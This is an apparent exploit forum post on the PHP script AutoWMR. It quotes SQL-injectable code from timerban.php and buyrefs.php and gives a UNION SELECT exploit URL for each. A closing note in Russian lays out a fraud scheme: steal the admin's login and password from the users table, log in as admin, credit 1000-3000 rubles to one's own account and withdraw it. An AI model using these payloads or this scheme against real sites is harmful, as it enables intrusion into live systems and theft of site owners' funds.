AutoWMR

[Online]

AutoWMR (download)
Version: 1.0

SQL inj
if mq = of
Vuln file: timerban.php

PHP код:

///
if(isset($_GET["r"])){
$aidi=($_GET["r"]);
$sql="SELECT * FROM tb_ads WHERE id='$aidi'";
/// 


Exploit:

Код:

http://[host]/[path]/timerban.php?r=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

SQL inj
if mq = of
Vuln file: buyrefs.php

PHP код:

///
$buy=($_GET["buy"]);

if(isset($buy)){
require('config.php');
$sql="SELECT * FROM tb_users WHERE id='$buy'";

/// 


Exploit:

Код:

http://[host]/[path]/buyrefs.php?buy=-1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+

P.S на этих движках стоят буксы. Регим акк на новенький кошель и пока забудем о нем... Так вот, узнаем из таблицы tb_users пароль|логин админа, заходим под ним, находим свой акк, начисляем 1000-3000 рублей (смотря сколько денег у админа ), всё. Заходим под своим акком и автоматически выводим деньги .